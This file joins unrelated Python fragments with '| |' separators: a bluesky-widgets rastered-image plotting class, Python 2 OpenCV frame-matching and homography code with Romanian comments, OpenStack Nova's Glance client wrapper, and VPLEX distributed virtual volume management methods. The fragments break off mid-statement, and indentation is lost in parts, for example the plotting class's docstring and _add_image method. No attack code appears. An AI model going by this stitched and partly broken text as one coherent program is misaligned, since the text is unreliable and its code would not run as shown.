class RasteredImages:
"""
Plot a rastered image from a Run.
Parameters
----------
field : string
Field name or expression
shape : Tuple[Integer]
The (row, col) shape of the raster
label_maker : Callable, optional
Expected signature::
f(run: BlueskyRun, y: String) -> label: String
needs_streams : List[String], optional
Streams referred to by field. Default is ``["primary"]``
namespace : Dict, optional
Inject additional tokens to be used in expressions for x and y
axes : Axes, optional
If None, an axes and figure are created with default labels and titles
derived from the ``x`` and ``y`` parameters.
clim : Tuple, optional
The color limits
cmap : String or Colormap, optional
The color map to use
extent : scalars (left, right, bottom, top), optional
Passed through to :meth:`matplotlib.axes.Axes.imshow`
x_positive : String, optional
Defines the positive direction of the x axis, takes the values 'right'
(default) or 'left'.
y_positive : String, optional
Defines the positive direction of the y axis, takes the values 'up'
(default) or 'down'.
show_colorbar: boolean
Show colorbar for the image.
Attributes
----------
run : BlueskyRun
The currently-viewed Run
figure : Figure
axes : Axes
field : String
Read-only access to field or expression
needs_streams : List[String], optional
Read-only access to streams referred to by field.
namespace : Dict, optional
Read-only access to user-provided namespace
Examples
--------
>>> model = RasteredImages("intensity", shape=(100, 200))
>>> from bluesky_widgets.jupyter.figures import JupyterFigure
>>> view = JupyterFigure(model.figure)
>>> model.add_run(run)
"""
    def __init__(
        self,
        field,
        shape,
        *,
        max_runs=1,
        label_maker=None,
        needs_streams=("primary",),
        namespace=None,
        axes=None,
        clim=None,
        cmap="viridis",
        extent=None,
        x_positive="right",
        y_positive="up",
        show_colorbar=False,
    ):
        super().__init__()
        if label_maker is None:
            # scan_id is always generated by RunEngine but not strictly required by
            # the schema, so we fail gracefully if it is missing.
            def label_maker(run, field):
                md = run.metadata["start"]
                return f"Scan ID {md.get('scan_id', '?')} UID {md['uid'][:8]} {field}"
        self._label_maker = label_maker
        # Stash these and expose them as read-only properties.
        self._field = field
        self._shape = shape
        self._namespace = namespace
        self._run = None
        # Create fresh axes/figure unless the caller supplied axes.
        if axes is None:
            axes = Axes()
            figure = Figure((axes,), title="")
        else:
            figure = axes.figure
        self.axes = axes
        self.figure = figure
        # If the Axes' figure is not yet set, listen for it to be set.
        if figure is None:
            def set_figure(event):
                self.figure = event.value
                # This occurs at most once, so we can now stop listening.
                self.axes.events.figure.disconnect(set_figure)
            self.axes.events.figure.connect(set_figure)
        # Display options; the mutable ones are exposed via properties that
        # also update artists already on the axes.
        self._clim = clim
        self._cmap = cmap
        self._extent = extent
        self._x_positive = x_positive
        self._y_positive = y_positive
        self._show_colorbar = bool(show_colorbar)
        self._run_manager = RunManager(max_runs, needs_streams)
        self._run_manager.events.run_ready.connect(self._add_image)
        self.add_run = self._run_manager.add_run
        self.discard_run = self._run_manager.discard_run
    @property
    def cmap(self):
        """The color map applied to image artists."""
        return self._cmap
    @cmap.setter
    def cmap(self, value):
        self._cmap = value
        # Propagate the new colormap to images already on the axes.
        for artist in self.axes.artists:
            if isinstance(artist, Image):
                artist.style.update({"cmap": value})
    @property
    def clim(self):
        """The color limits applied to image artists."""
        return self._clim
    @clim.setter
    def clim(self, value):
        self._clim = value
        # Propagate the new limits to images already on the axes.
        for artist in self.axes.artists:
            if isinstance(artist, Image):
                artist.style.update({"clim": value})
    @property
    def extent(self):
        """The (left, right, bottom, top) extent passed to imshow."""
        return self._extent
    @extent.setter
    def extent(self, value):
        self._extent = value
        # Propagate the new extent to images already on the axes.
        for artist in self.axes.artists:
            if isinstance(artist, Image):
                artist.style.update({"extent": value})
    @property
    def x_positive(self):
        """Positive direction of the x axis: 'right' or 'left'.

        Derived from the current axes limits, so the cached value is
        refreshed (side effect) on every read.
        """
        xmin, xmax = self.axes.x_limits
        if xmin > xmax:
            self._x_positive = "left"
        else:
            self._x_positive = "right"
        return self._x_positive
    @x_positive.setter
    def x_positive(self, value):
        if value not in ["right", "left"]:
            raise ValueError('x_positive must be "right" or "left"')
        self._x_positive = value
        # Flip the axes limits when they disagree with the requested direction.
        xmin, xmax = self.axes.x_limits
        if (xmin > xmax and self._x_positive == "right") or (xmax > xmin and self._x_positive == "left"):
            self.axes.x_limits = (xmax, xmin)
        elif (xmax >= xmin and self._x_positive == "right") or (xmin >= xmax and self._x_positive == "left"):
            self.axes.x_limits = (xmin, xmax)
        # NOTE(review): redundant -- value was already assigned above.
        self._x_positive = value
    @property
    def y_positive(self):
        """Positive direction of the y axis: 'up' or 'down'.

        Derived from the current axes limits, so the cached value is
        refreshed (side effect) on every read.
        """
        ymin, ymax = self.axes.y_limits
        if ymin > ymax:
            self._y_positive = "down"
        else:
            self._y_positive = "up"
        return self._y_positive
    @y_positive.setter
    def y_positive(self, value):
        if value not in ["up", "down"]:
            raise ValueError('y_positive must be "up" or "down"')
        self._y_positive = value
        # Flip the axes limits when they disagree with the requested direction.
        ymin, ymax = self.axes.y_limits
        if (ymin > ymax and self._y_positive == "up") or (ymax > ymin and self._y_positive == "down"):
            self.axes.y_limits = (ymax, ymin)
        elif (ymax >= ymin and self._y_positive == "up") or (ymin >= ymax and self._y_positive == "down"):
            self.axes.y_limits = (ymin, ymax)
        # NOTE(review): redundant -- value was already assigned above.
        self._y_positive = value
    @property
    def show_colorbar(self):
        """
        Display colorbar for new images (``True``) or show images without one
        (``False``).

        The setting does not influence an image that is already displayed;
        it only affects images added afterwards.  The property may be used
        to modify the value passed to the constructor.
        """
        return self._show_colorbar
    @show_colorbar.setter
    def show_colorbar(self, show_colorbar):
        # Coerce to a strict boolean, mirroring the constructor.
        self._show_colorbar = bool(show_colorbar)
def _add_image(self, event):
run = event.run
func = functools.partial(self._transform, field=self.field)
style = {
"cmap": self._cmap,
"clim": self._clim,
"extent": self._extent,
"show_colorbar": self._show_colorbar,
}
image = Image.from_run(func, run, label=self.field, style=style)
self._run_manager.track_artist(image, [run])
md = run.metadata["start"]
self.axes.artists.append(image)
self.axes.title = self._label_maker(run, self.field)
self.axes.x_label = md["motors"][1]
self.axes.y_label = md["motors"][0]
# By default, pixels center | |
% (str(kp1[counterQ][0].pt))
print "imgQ - desc1[counterQ][0] = %s" % (str(desc1[counterQ][0]))
except:
common.DebugPrintErrorTrace()
if len(p1) >= 4:
# p1 and p2 are the matched keypoints
"""
From Section 6.1, page 391, opencv2refman.pdf:
(also http://docs.opencv.org/modules/calib3d/doc/camera_calibration_and_3d_reconstruction.html?highlight=findhomography#findhomography):
"Finds a perspective transformation between two planes."
"However, if not all of the point pairs (srcPoints
i ,:math:dstPoints_i ) fit the rigid perspective transformation (that is,
there are some outliers), this initial estimate will be poor."
"In this case, you can use one of the two robust methods.
Both methods, RANSAC and LMeDS , try many different random subsets
of the corresponding point pairs (of four pairs each), estimate
the homography matrix using this subset and a simple least-square
algorithm, and then compute the quality/goodness of the computed
homography (which is the number of inliers for RANSAC or the median
re-projection error for LMeDs). The best subset is then used to
produce the initial estimate of the homography matrix and the
mask of inliers/outliers."
"""
t1 = float(cv2.getTickCount())
#cv2.findHomography(srcPoints, dstPoints[, method[, ransacReprojThreshold[, mask ]]]) --> ret-val, mask
H, status = cv2.findHomography(srcPoints=p1, dstPoints=p2, \
method=cv2.RANSAC, ransacReprojThreshold=5.0) #, mask=3.0)
t2 = float(cv2.getTickCount())
myTime = (t2 - t1) / cv2.getTickFrequency()
common.DebugPrint(
"FeatureMatchAndHomography(): cv2.findHomography() took %.6f [sec]" % \
(myTime))
#if True:
if False:
print "status = %s" % (str(status))
#assert status != None #This assertion is violated (at least on OpenCV 3.0)
if status == None:
status = []
if H == None:
print "!!!!!!!!found H None - len(p1) = %d" % (len(p1))
H = []
return (-1, len(p1))
print "%d / %d inliers/matched (len(p1) = %d)" % (np.sum(status), len(status), len(p1))
# Note: H is the homography matrix, a 3x3 matrix.
common.DebugPrint(
"H, the homography matrix, from cv2.findHomography = %s" % str(H))
common.DebugPrint(" len(H) = %d" % len(H))
# Note that len(status) == len(p1)
res = (np.sum(status), len(status))
else:
H, status = None, None
common.DebugPrint(
"%d matches found, not enough for homography estimation" % len(p1))
res = (-1, len(p1))
# The result is related to the homography transformation: status sum and len
return res
"""
Avoid using so many globals.
Should we have modules:
TemporalAlignment
SpatialAlignment
Clustering
?
!!!!TODO !!!!!!!! Do better interface for the processing pipeline:
e.g., TODO
- implement return (frame, ref_frame, feature_set, ref_feature_set)
(frame, ref_frame, feature_set, ref_feature_set)
- frame este un frame din filmul curent
- ref_frame este frame-ul cel mai apropiat din filmul referinta
- feature_set este multimea descriptorilor SIFT/ORB/whatever extrasi din frame
- ref_feature_set este multimea descriptorilor SIFT/ORB/whatever extrasi din ref_frame
- pasul de spatial aligment urmareste sa identificam sectiunile
din frame care nu se regasesc in ref_frame, si sa eliminam din feature_set
acele features care cad in afara zonei de suprapunere intre frame si
ref_frame.
Pasul de aliniere spatiala livreaza catre clustering un tuplu (frame,
reduced_feature_set), unde:
- frame este un cadru din filmul curent (nici o modificare fata de ce am
primit de la alinierea temporala)
- reduced_feature_set este submultimea lui feature_set care indeplineste
conditia ca feature-ul se afla intr-o zona de suprapunere a lui
frame cu ref_frame
- pasul Clustering livreaza urmatoarele: (frame, cluster_areas), unde:
- frame iarasi e nemodificat
- cluster_areas reprezinta definitiile spatiale ale clusterelor identificate
Currently the Rest() of the pipepline is called by TemporalAlignment, when
found an optimal candidate.
Temporal alignment:
- for each reference frame:
- we also detect features (and compute descriptors) for reference frame
- FeatureMatchAndHomography()
- knnMatch()
- FilterKeypointsMatches()
- homography
"""
def TemporalAlignment(counterQ, frameQ, captureR, numFramesR, \
numFeaturesMatched, fOutput):
global p1, p2, kp_pairs, status, H, nonp1
if config.USE_EXHAUSTIVE_SEARCH:
maxFeaturesMatched = -2000000000 #-1
posMaxFeaturesMatched = -1
while True:
if config.OCV_OLD_PY_BINDINGS:
frameR = captureR.get(cv2.cv.CV_CAP_PROP_POS_FRAMES)
else:
frameR = captureR.get(cv2.CAP_PROP_POS_FRAMES)
common.DebugPrint("Alex: frameR = %d" % frameR)
counterR = int(frameR) #0
ret2, imgR = captureR.read()
if (ret2 == False) or (counterR > numFramesR):
break
#if False and config.SAVE_FRAMES:
if config.SAVE_FRAMES:
fileName = config.IMAGES_FOLDER + "/imgR_%05d.png" % counterR
if not os.path.exists(fileName):
#print "dir(imgR) = %s"% str(dir(imgR))
"""
imgRCV = cv.fromarray(imgR)
cv2.imwrite(fileName, imgRCV)
"""
cv2.imwrite(fileName, imgR)
#quit()
if False:
#if True:
print "Alex: ret1 = %s" % (str(ret1))
print "Alex: imgQ = %s" % (str(imgQ))
print "Alex: ret2 = %s" % (str(ret2))
print "Alex: imgR = %s" % (str(imgR))
if False:
cv2.imshow("imgQ", imgQ)
cv2.imshow("imgR", imgR)
if False:
#result = processFrame(img)
result = img
cv2.imshow("some", result)
if 0xFF & (cv2.waitKey(5) == 27):
break
"""
I don't need to change to gray image if I do NOT do
MatchFrames....() , which requires gray to
concatenate the 2 frames together.
"""
if False:
#if True:
"""
Note: imgQ and imgR are RGB-images.
I need to convert them to grayscale
(since cv2.imread(fn1, 0) reads grayscale)
"""
imgR = common.ConvertImgToGrayscale(imgR)
res = ComputeFeaturesAndMatch2(imgR, counterR)
# res[1] = number of matched features
COST_USED = 1
if COST_USED == 0:
pass
else:
# myTemporalAlignmentCost is the sum of distances of best-pairs (closest neighbors) of matched features
res = (res[0], -myTemporalAlignmentCost)
#res = (res[0], -myTemporalAlignmentCost / res[1])
numFeaturesMatched[counterQ][counterR] = res[1]
COMPUTE_BEST_FAST = False #True
if maxFeaturesMatched < res[1]:
maxFeaturesMatched = res[1]
posMaxFeaturesMatched = counterR
if config.SAVE_FRAMES:
if COMPUTE_BEST_FAST == False:
"""
#!!!!TODO: don't do it even for best candidates - only for the best ONE - this implies redoing probably some computation from TemporalAlignment() for the best frame pair
We call Rest() in order to compute vis and visOrig.
"""
Rest("Image Match")
visBest = vis.copy()
visOrigBest = visOrig.copy()
else:
p1Best = p1
p2Best = p2
kp_pairsBest = kp_pairs
statusBest = status
HBest = H
nonp1Best = nonp1
#if True:
if False:
#res = ComputeFeaturesAndMatch2(imgR, counterR) # We repeat the MatchFrame to save the frames
"""
visCV = cv.fromarray(vis)
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/img_proc_%05d_%05d.png" % \
(counterQ, counterR), visCV)
"""
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/img_proc_%05d_%05d.png" % \
(counterQ, counterR), vis)
"""
visCV = cv.fromarray(visBest)
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/1img_proc_%05d_%05d.png" % \
(counterQ, counterR), visCV)
"""
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/1img_proc_%05d_%05d.png" % \
(counterQ, counterR), vis)
common.DebugPrint("Alex: counterR = %d" % counterR)
counterR += config.counterRStep
if False:
counterQ += config.counterQStep #10 #1
"""
If we try to seek to a frame out-of-bounds frame it gets to
the last one.
"""
if config.OCV_OLD_PY_BINDINGS:
captureR.set(cv2.cv.CV_CAP_PROP_POS_FRAMES, counterR)
else:
captureR.set(cv2.CAP_PROP_POS_FRAMES, counterR)
common.DebugPrint("Alex: Time = %s" % \
common.GetCurrentDateTimeStringWithMilliseconds())
myText = " Frame #%d of video A: " \
"frame #%d of video B, with %d features matched (time = %s)" % \
(counterQ, posMaxFeaturesMatched, maxFeaturesMatched,
common.GetCurrentDateTimeStringWithMilliseconds())
print >>fOutput, myText
fOutput.flush()
#posMaxFeaturesMatched = counterR
counterRBest = posMaxFeaturesMatched
else:
# We empty the memoization cache before SimAnneal.main()
SimAnneal.Acache = {}
res = SimAnneal.main()
res2 = (res[0], -res[1])
common.DebugPrint(
"Best solution for frame counterQ=%d is %s. Time = %s" % \
(counterQ, str(res2), GetCurrentDateTimeStringWithMilliseconds()) )
#!!!!TODO: check if OK:
counterRBest = res[0]
if COMPUTE_BEST_FAST == True:
"""
!!!!TODO: check that these assignments really refer the objects defined above (when updating) and that there are no escapes of the values/objects that result in side-effects updating the respective objects and messing everything up - better said we look if redefinitons of the rhs are done inside (some of their subelements) or totally (reassign a completely NEW object).
"""
p1 = p1Best
p2 = p2Best
kp_pairs = kp_pairsBest
status = statusBest
H = HBest
nonp1 = nonp1Best
Rest("Image Match")
visBest = vis.copy()
visOrigBest = visOrig.copy()
if config.SAVE_FRAMES:
if False:
# We move the existing image pair of the matched frames to a special folder
srcFileName = "img_proc_%05d_%05d.png" % (counterQ, counterRBest)
dstFileName = config.FRAME_PAIRS_MATCHES_FOLDER + "/" + srcFileName
srcFileName = config.FRAME_PAIRS_FOLDER + "/" + srcFileName
try:
shutil.move(srcFileName, dstFileName)
except shutil.Error as exc:
pass
"""
We display frames imgQ and imgR with features (from temporal) and
clusters on them.
"""
"""
visBestCV = cv.fromarray(visBest)
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/img_proc_%05d_%05d.png" % \
(counterQ, counterRBest), visBestCV)
"""
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/img_proc_%05d_%05d.png" % \
(counterQ, counterRBest), visBest)
# We display also the orig frames imgQ and imgR
"""
visOrigBestCV = cv.fromarray(visOrigBest)
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/img_proc_%05d_%05d_orig.png" % \
(counterQ, counterRBest), visOrigBestCV)
"""
cv2.imwrite(config.FRAME_PAIRS_MATCHES_FOLDER + \
"/img_proc_%05d_%05d_orig.png" % \
(counterQ, | |
# Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of an image service that uses Glance as the backend."""
from __future__ import absolute_import
import copy
import inspect
import itertools
import os
import random
import re
import stat
import sys
import time
import cryptography
from cursive import certificate_utils
from cursive import exception as cursive_exception
from cursive import signature_utils
import glanceclient
import glanceclient.exc
from glanceclient.v2 import schemas
from keystoneauth1 import loading as ks_loading
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import excutils
from oslo_utils import timeutils
import six
from six.moves import range
import six.moves.urllib.parse as urlparse
import nova.conf
from nova import exception
import nova.image.download as image_xfers
from nova import objects
from nova.objects import fields
from nova import service_auth
from nova import utils
LOG = logging.getLogger(__name__)
CONF = nova.conf.CONF
_SESSION = None
def _session_and_auth(context):
    """Return the process-wide keystone session and a per-request auth.

    The session is expensive to construct, so it is built lazily once and
    cached in the module-level ``_SESSION``; the auth plugin depends on the
    caller's context and is resolved on every call.
    """
    global _SESSION
    if not _SESSION:
        group_name = nova.conf.glance.glance_group.name
        _SESSION = ks_loading.load_session_from_conf_options(CONF, group_name)
    return _SESSION, service_auth.get_auth_plugin(context)
def _glanceclient_from_endpoint(context, endpoint, version):
    """Build a glance client pinned to a single endpoint.

    Uses the shared cached session plus a context-derived auth plugin, and
    propagates the request's global id to glance.
    """
    session, auth = _session_and_auth(context)
    return glanceclient.Client(
        version,
        session=session,
        auth=auth,
        endpoint_override=endpoint,
        global_request_id=context.global_id)
def generate_glance_url(context):
    """Return a random glance url from the api servers we know about."""
    servers = get_api_servers(context)
    return next(servers)
def _endpoint_from_image_ref(image_href):
"""Return the image_ref and guessed endpoint from an image url.
:param image_href: href of an image
:returns: a tuple of the form (image_id, endpoint_url)
"""
parts = image_href.split('/')
image_id = parts[-1]
# the endpoint is everything in the url except the last 3 bits
# which are version, 'images', and image_id
endpoint = '/'.join(parts[:-3])
return (image_id, endpoint)
def generate_identity_headers(context, status='Confirmed'):
    """Build the X-* identity headers glance expects from a request context.

    Missing context attributes degrade gracefully to None (or an empty
    role list) rather than raising.
    """
    roles = getattr(context, 'roles', [])
    headers = {
        'X-Auth-Token': getattr(context, 'auth_token', None),
        'X-User-Id': getattr(context, 'user_id', None),
        'X-Tenant-Id': getattr(context, 'project_id', None),
        'X-Roles': ','.join(roles),
        'X-Identity-Status': status,
    }
    return headers
def get_api_servers(context):
    """Shuffle a list of service endpoints and return an iterator that will
    cycle through the list, looping around to the beginning if necessary.
    """
    # NOTE(efried): utils.get_ksa_adapter().get_endpoint() is the preferred
    # mechanism for endpoint discovery. Only use `api_servers` if you really
    # need to shuffle multiple endpoints.
    if CONF.glance.api_servers:
        # BUG FIX: random.shuffle works in place, so shuffle a copy rather
        # than reordering the list object owned by oslo.config (which would
        # be visible to every other reader of CONF.glance.api_servers).
        api_servers = list(CONF.glance.api_servers)
        random.shuffle(api_servers)
    else:
        sess, auth = _session_and_auth(context)
        ksa_adap = utils.get_ksa_adapter(
            nova.conf.glance.DEFAULT_SERVICE_TYPE,
            ksa_auth=auth, ksa_session=sess,
            min_version='2.0', max_version='2.latest')
        endpoint = utils.get_endpoint(ksa_adap)
        if endpoint:
            # NOTE(mriedem): Due to python-glanceclient bug 1707995 we have
            # to massage the endpoint URL otherwise it won't work properly.
            # We can't use glanceclient.common.utils.strip_version because
            # of bug 1748009.
            endpoint = re.sub(r'/v\d+(\.\d+)?/?$', '/', endpoint)
            api_servers = [endpoint]
    return itertools.cycle(api_servers)
class GlanceClientWrapper(object):
    """Glance client wrapper class that implements retries."""
    def __init__(self, context=None, endpoint=None):
        # Only the v2 image API is used by this wrapper.
        version = 2
        if endpoint is not None:
            # A static client is pinned to this endpoint for every call.
            self.client = self._create_static_client(context,
                                                     endpoint,
                                                     version)
        else:
            # No endpoint given: a fresh client is built per call, rotating
            # through the known API servers (see _create_onetime_client).
            self.client = None
        self.api_servers = None
    def _create_static_client(self, context, endpoint, version):
        """Create a client that we'll use for every call."""
        self.api_server = str(endpoint)
        return _glanceclient_from_endpoint(context, endpoint, version)
    def _create_onetime_client(self, context, version):
        """Create a client that will be used for one call."""
        # The server iterator is created lazily and cycles forever.
        if self.api_servers is None:
            self.api_servers = get_api_servers(context)
        self.api_server = next(self.api_servers)
        return _glanceclient_from_endpoint(context, self.api_server, version)
    def call(self, context, version, method, *args, **kwargs):
        """Call a glance client method. If we get a connection error,
        retry the request according to CONF.glance.num_retries.

        :param method: name of the method to invoke on the controller;
            the optional 'controller' kwarg selects the glanceclient
            controller attribute (default: 'images').
        :raises: exception.GlanceConnectionFailed when every attempt fails
            with a connection-class error.
        """
        retry_excs = (glanceclient.exc.ServiceUnavailable,
                      glanceclient.exc.InvalidEndpoint,
                      glanceclient.exc.CommunicationError)
        num_attempts = 1 + CONF.glance.num_retries
        for attempt in range(1, num_attempts + 1):
            # Reuse the static client if configured; otherwise each attempt
            # may target a different API server.
            client = self.client or self._create_onetime_client(context,
                                                                version)
            try:
                controller = getattr(client,
                                     kwargs.pop('controller', 'images'))
                result = getattr(controller, method)(*args, **kwargs)
                if inspect.isgenerator(result):
                    # Convert generator results to a list, so that we can
                    # catch any potential exceptions now and retry the call.
                    return list(result)
                return result
            except retry_excs as e:
                if attempt < num_attempts:
                    extra = "retrying"
                else:
                    extra = 'done trying'
                LOG.exception("Error contacting glance server "
                              "'%(server)s' for '%(method)s', "
                              "%(extra)s.",
                              {'server': self.api_server,
                               'method': method, 'extra': extra})
                if attempt == num_attempts:
                    raise exception.GlanceConnectionFailed(
                        server=str(self.api_server), reason=six.text_type(e))
                # Brief pause before trying the next server / attempt.
                time.sleep(1)
class GlanceImageServiceV2(object):
"""Provides storage and retrieval of disk image objects within Glance."""
def __init__(self, client=None):
self._client = client or GlanceClientWrapper()
# NOTE(jbresnah) build the table of download handlers at the beginning
# so that operators can catch errors at load time rather than whenever
# a user attempts to use a module. Note this cannot be done in glance
# space when this python module is loaded because the download module
# may require configuration options to be parsed.
self._download_handlers = {}
download_modules = image_xfers.load_transfer_modules()
for scheme, mod in download_modules.items():
if scheme not in CONF.glance.allowed_direct_url_schemes:
continue
try:
self._download_handlers[scheme] = mod.get_download_handler()
except Exception as ex:
LOG.error('When loading the module %(module_str)s the '
'following error occurred: %(ex)s',
{'module_str': str(mod), 'ex': ex})
def show(self, context, image_id, include_locations=False,
show_deleted=True):
"""Returns a dict with image data for the given opaque image id.
:param context: The context object to pass to image client
:param image_id: The UUID of the image
:param include_locations: (Optional) include locations in the returned
dict of information if the image service API
supports it. If the image service API does
not support the locations attribute, it will
still be included in the returned dict, as an
empty list.
:param show_deleted: (Optional) show the image even the status of
image is deleted.
"""
try:
image = self._client.call(context, 2, 'get', image_id)
except Exception:
_reraise_translated_image_exception(image_id)
if not show_deleted and getattr(image, 'deleted', False):
raise exception.ImageNotFound(image_id=image_id)
if not _is_image_available(context, image):
raise exception.ImageNotFound(image_id=image_id)
image = _translate_from_glance(image,
include_locations=include_locations)
if include_locations:
locations = image.get('locations', None) or []
du = image.get('direct_url', None)
if du:
locations.append({'url': du, 'metadata': {}})
image['locations'] = locations
return image
def _get_transfer_module(self, scheme):
try:
return self._download_handlers[scheme]
except KeyError:
return None
except Exception:
LOG.error("Failed to instantiate the download handler "
"for %(scheme)s", {'scheme': scheme})
return
def detail(self, context, **kwargs):
"""Calls out to Glance for a list of detailed image information."""
params = _extract_query_params_v2(kwargs)
try:
images = self._client.call(context, 2, 'list', **params)
except Exception:
_reraise_translated_exception()
_images = []
for image in images:
if _is_image_available(context, image):
_images.append(_translate_from_glance(image))
return _images
@staticmethod
def _safe_fsync(fh):
"""Performs os.fsync on a filehandle only if it is supported.
fsync on a pipe, FIFO, or socket raises OSError with EINVAL. This
method discovers whether the target filehandle is one of these types
and only performs fsync if it isn't.
:param fh: Open filehandle (not a path or fileno) to maybe fsync.
"""
fileno = fh.fileno()
mode = os.fstat(fileno).st_mode
# A pipe answers True to S_ISFIFO
if not any(check(mode) for check in (stat.S_ISFIFO, stat.S_ISSOCK)):
os.fsync(fileno)
def download(self, context, image_id, data=None, dst_path=None,
trusted_certs=None):
"""Calls out to Glance for data and writes data."""
if CONF.glance.allowed_direct_url_schemes and dst_path is not None:
image = self.show(context, image_id, include_locations=True)
for entry in image.get('locations', []):
loc_url = entry['url']
loc_meta = entry['metadata']
o = urlparse.urlparse(loc_url)
xfer_mod = self._get_transfer_module(o.scheme)
if xfer_mod:
try:
xfer_mod.download(context, o, dst_path, loc_meta)
LOG.info("Successfully transferred using %s", o.scheme)
return
except Exception:
LOG.exception("Download image error")
try:
image_chunks = self._client.call(context, 2, 'data', image_id)
except Exception:
_reraise_translated_image_exception(image_id)
if image_chunks.wrapped is None:
# None is a valid return value, but there's nothing we can do with
# a image with no associated data
raise exception.ImageUnacceptable(image_id=image_id,
reason='Image has no associated data')
# Retrieve properties for verification of Glance image signature
verifier = self._get_verifier(context, image_id, trusted_certs)
close_file = False
if data is None and dst_path:
data = open(dst_path, 'wb')
close_file = True
if data is None:
# Perform image signature verification
if verifier:
try:
for chunk in image_chunks:
verifier.update(chunk)
verifier.verify()
LOG.info('Image signature verification succeeded '
'for image: %s', image_id)
except cryptography.exceptions.InvalidSignature:
with excutils.save_and_reraise_exception():
LOG.error('Image signature verification failed '
'for image: %s', image_id)
return image_chunks
else:
try:
for chunk in image_chunks:
if verifier:
verifier.update(chunk)
data.write(chunk)
if verifier:
verifier.verify()
LOG.info('Image signature verification succeeded '
'for image %s', image_id)
except cryptography.exceptions.InvalidSignature:
data.truncate(0)
with excutils.save_and_reraise_exception():
LOG.error('Image signature verification failed '
'for image: %s', image_id)
except Exception as ex:
with excutils.save_and_reraise_exception():
LOG.error("Error writing to %(path)s: %(exception)s",
{'path': dst_path, 'exception': ex})
finally:
if close_file:
# Ensure that the data is pushed all the | |
'/name',
'value': new_dist_vv_name}]
dist_vv_details = self.distvv.patch_distributed_virtual_volume(
dist_vv_name, dist_vv_patch_payload)
LOG.info("Renamed the distributed virtual volume %s to %s",
dist_vv_name, new_dist_vv_name)
LOG.debug("Distributed Virtual Volume Details:\n%s",
dist_vv_details)
return dist_vv_details
except (utils.ApiException, ValueError, TypeError) as err:
err_msg = "Could not rename distributed virtual volume {0} to {1}"
err_msg = err_msg.format(
dist_vv_name, new_dist_vv_name) + " due to error: {0}"
e_msg = utils.display_error(err_msg, err)
LOG.error("%s\n%s\n", e_msg, err)
self.module.fail_json(msg=e_msg)
def expand_distributed_vv(self, dist_vv_name, dist_vv_expand_payload):
"""
Expand the distributed virtual volume
"""
try:
dist_vv_details = self.distvv.expand_distributed_virtual_volume(
dist_vv_name, dist_vv_expand_payload)
LOG.info("Expanded the distributed virtual volume %s",
dist_vv_name)
LOG.debug("Distributed Virtual Volume Details:\n%s",
dist_vv_details)
return dist_vv_details
except (utils.ApiException, ValueError, TypeError) as err:
err_msg = "Could not expand distributed virtual volume {0} due"
err_msg = err_msg.format(dist_vv_name) + " to error: {0}"
e_msg = utils.display_error(err_msg, err)
LOG.error("%s\n%s\n", e_msg, err)
self.module.fail_json(msg=e_msg)
def delete_distributed_vv(self, dist_vv_name):
"""
Delete the distributed virtual volume
"""
try:
self.distvv.delete_distributed_virtual_volume(
dist_vv_name)
LOG.info("Deleted distributed virtual volume %s", dist_vv_name)
return True
except (utils.ApiException, ValueError, TypeError) as err:
err_msg = "Could not delete distributed virtual volume {0} due"
err_msg = err_msg.format(dist_vv_name) + " to error: {0}"
e_msg = utils.display_error(err_msg, err)
LOG.error("%s\n%s\n", e_msg, err)
self.module.fail_json(msg=e_msg)
def create_distributed_vv(self, dist_vv_payload):
"""
Create a distributed virtual volume
"""
try:
dist_vv_details = self.distvv.create_distributed_virtual_volume(
dist_vv_payload)
LOG.info("Created distributed virtual volume %s",
dist_vv_details.name)
LOG.debug("Distributed Virtual Volume Details:\n%s",
dist_vv_details)
return dist_vv_details
except (utils.ApiException, ValueError, TypeError) as err:
err_msg = "Could not create distributed virtual volume due to"
err_msg = err_msg + " error: {0}"
e_msg = utils.display_error(err_msg, err)
LOG.error("%s\n%s\n", e_msg, err)
self.module.fail_json(msg=e_msg)
def get_dist_vv_by_id(self, dist_vv_id):
"""
Get distributed virtual volume details by using distributed virtual
volume id
"""
LOG.info("Trying to get distributed virtual volume by ID %s",
dist_vv_id)
data = [vol for vol in self.get_distributed_virtual_volumes()
if vol.system_id == dist_vv_id]
if len(data) > 0:
LOG.info("Found Distributed Virtual Volume details for %s from"
" ID %s", data[0].name, dist_vv_id)
LOG.debug("Distributed Virtual Volume Details: %s", data)
return data[0]
return None
def get_distributed_virtual_volumes(self):
"""
Get all distributed virtual volumes
"""
LOG.info("Get all distributed virtual volumes")
try:
res = self.distvv.get_distributed_virtual_volumes()
LOG.debug("Distributed Virtual Volumes Details: %s", res)
return res
except (utils.ApiException, ValueError, TypeError) as err:
err_msg = "Could not get the distributed virtual volumes due to"
err_msg = err_msg + " error: {0}"
e_msg = utils.display_error(err_msg, err)
LOG.error("%s\n%s\n", e_msg, err)
self.module.fail_json(msg=e_msg)
def get_distributed_device(self, dev_name):
"""
Get distributed device details
"""
try:
dev = self.distvv.get_distributed_device(dev_name)
LOG.info("Got Distributed Device details %s", dev_name)
LOG.debug("Distributed Device Details: %s", dev)
return dev
except utils.ApiException as err:
err_msg = ("Could not get the distributed device {0} due to"
" error: {1}".format(dev_name, utils.error_msg(err)))
LOG.error("%s\n%s\n", err_msg, err)
return None
except (ValueError, TypeError) as err:
err_msg = "Could not get the distributed device {0} due to"
err_msg = err_msg + " error: {1}"
e_msg = utils.display_error(err_msg, err)
LOG.error("%s\n%s\n", e_msg, err)
self.module.fail_json(msg=e_msg)
def check_name_existence(self, name):
"""
Check for the existence of distributed virtual volume name across
clusters in Vplex setup
"""
LOG.info("Check for the distributed virtual volume name existence"
" across clusters")
cluster_details = self.cluster.get_clusters()
cl_name = [clus.name for clus in cluster_details
